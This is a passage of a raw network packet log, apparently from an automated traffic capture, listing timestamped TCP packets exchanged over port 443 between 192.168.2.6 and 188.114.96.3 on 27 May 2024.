        May 27, 2024 15:21:12.890011072 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.893517017 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.893536091 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.893596888 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.893604040 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.943911076 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.984842062 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.984860897 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.985013008 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.985022068 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.985075951 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.985172033 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.985184908 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.985251904 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.985258102 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.985312939 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.985652924 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.985667944 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.985738039 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.985743046 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.985795975 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.986008883 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.986023903 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.986093998 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.986098051 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.986146927 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.986394882 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.986407995 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.986474037 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.986483097 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.986583948 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.986761093 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.986782074 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.986854076 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.986859083 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.986912012 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.987123966 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.987138987 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.987209082 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.987214088 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.987272024 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.987456083 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.987469912 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.987543106 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:12.987549067 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:12.987598896 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.074302912 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.074325085 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.074409008 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.074436903 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.074512005 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.074565887 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.074580908 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.074645042 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.074657917 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.074750900 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.075073957 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.075092077 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.075148106 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.075155020 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.075203896 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.075472116 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.075486898 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.075541973 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.075550079 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.075587988 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.075982094 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.075998068 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.076061010 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.076066017 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.076108932 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.076390982 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.076405048 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.076462984 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.076467991 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.076508045 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.076853037 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.076867104 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.076929092 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.076935053 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.076975107 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.077177048 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.077191114 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.077250957 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.077255964 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.077297926 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.167431116 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.167450905 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.167597055 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.167620897 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.167684078 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.167752981 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.167768955 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.167849064 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.167860985 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.167913914 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.168142080 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.168164015 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.168212891 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.168220997 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.168255091 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.168273926 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.168471098 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.168486118 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.168551922 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.168556929 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.168600082 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.169045925 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.169065952 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.169131041 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.169137001 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.169181108 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.169439077 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.169454098 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.169517040 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.169523954 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.169564962 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.169912100 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.169928074 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.169986010 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.169991970 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.170033932 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.170593023 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.170608044 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.170671940 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.170677900 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.170722008 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.256056070 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.256071091 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.256395102 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.256459951 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.256491899 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.256510019 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.256546021 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.256563902 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.256598949 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.256658077 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.256745100 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.256762028 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.256829977 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.256836891 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.256891012 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.257143974 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.257158041 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.257220984 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.257226944 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.257282972 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.257720947 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.257740021 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.257801056 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.257807016 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.257859945 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.258147955 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.258162022 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.258224010 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.258229971 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.258285046 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.258475065 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.258491993 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.258549929 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.258555889 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.258590937 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.258621931 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.258766890 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.258780003 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.258857012 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.258862019 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.258917093 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.347619057 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.347635984 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.347748995 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.347767115 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.347819090 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.348066092 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348079920 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348145962 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.348154068 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348201036 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.348397017 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348411083 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348473072 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.348479033 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348524094 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.348566055 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348587036 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348649025 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.348655939 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348701954 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.348779917 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348795891 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348851919 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.348858118 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.348895073 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.350414991 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.350429058 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.350495100 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.350501060 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.350538015 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.350548983 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.350553989 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.350572109 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.350589037 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.350640059 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.350644112 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.350687981 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.350701094 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.350708008 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.350712061 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.350771904 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.350924969 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.449362040 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449379921 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449451923 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.449459076 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449521065 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.449623108 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449670076 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449692011 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.449708939 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449752092 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.449771881 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449786901 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449850082 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.449853897 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449902058 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449904919 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.449912071 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449938059 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.449970007 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.449976921 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.450012922 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.450036049 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.450300932 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.450314999 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.450377941 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.450383902 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.450436115 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.450511932 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.450525999 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.450592041 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.450597048 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.450604916 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.450632095 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.450650930 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.450664043 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.450696945 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.450752020 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.457453012 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.457468987 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.457534075 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.457542896 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.457597971 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.541748047 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.541785002 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.541866064 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.541876078 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.541906118 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.541917086 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.541927099 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.541944981 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.541949034 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.541985035 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.542002916 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.542009115 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.542031050 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.542037964 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.542077065 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.542110920 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.542310953 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.542326927 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.542395115 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.542401075 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.542448044 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.542448044 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.542458057 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.542494059 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.542511940 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.542519093 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.542552948 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.542572021 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.542973042 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.542989969 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.543054104 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.543061018 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.543107986 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.543184042 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.543200970 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.543262005 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.543267012 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.543311119 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.543334961 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.543349981 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.543402910 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.543409109 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.543452024 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.633183002 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.633204937 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.633310080 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.633317947 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.633367062 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.633414030 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.633428097 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.633486986 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.633491993 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.633536100 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.634047985 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634062052 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634120941 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634128094 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.634134054 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634191990 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.634198904 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634287119 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.634293079 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634602070 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634620905 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634664059 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634671926 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.634675980 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634707928 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.634716034 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634748936 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.634754896 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634794950 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.634814978 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.634821892 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634840965 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634902000 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.634906054 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.634975910 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.723902941 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.723931074 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.724035978 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.724045038 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.724097013 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.724354029 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.724376917 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.724442005 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.724447966 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.724483967 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.724499941 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.724505901 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.724523067 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.724554062 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.724603891 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.724734068 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.724750042 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.724826097 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.724832058 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.725128889 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.725130081 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.725140095 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.725168943 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.725197077 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.725203991 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.725229979 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.725261927 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.725560904 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.725578070 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.725639105 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.725646973 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.725698948 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.725819111 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.725837946 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.725908995 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.725914955 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.725963116 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.726057053 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.726074934 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.726138115 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.726144075 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.726200104 CEST49713443192.168.2.6188.114.96.3
        May 27, 2024 15:21:13.814940929 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.814959049 CEST44349713188.114.96.3192.168.2.6
        May 27, 2024 15:21:13.815052986 CEST49713443192.168.2.6188.114.96.3
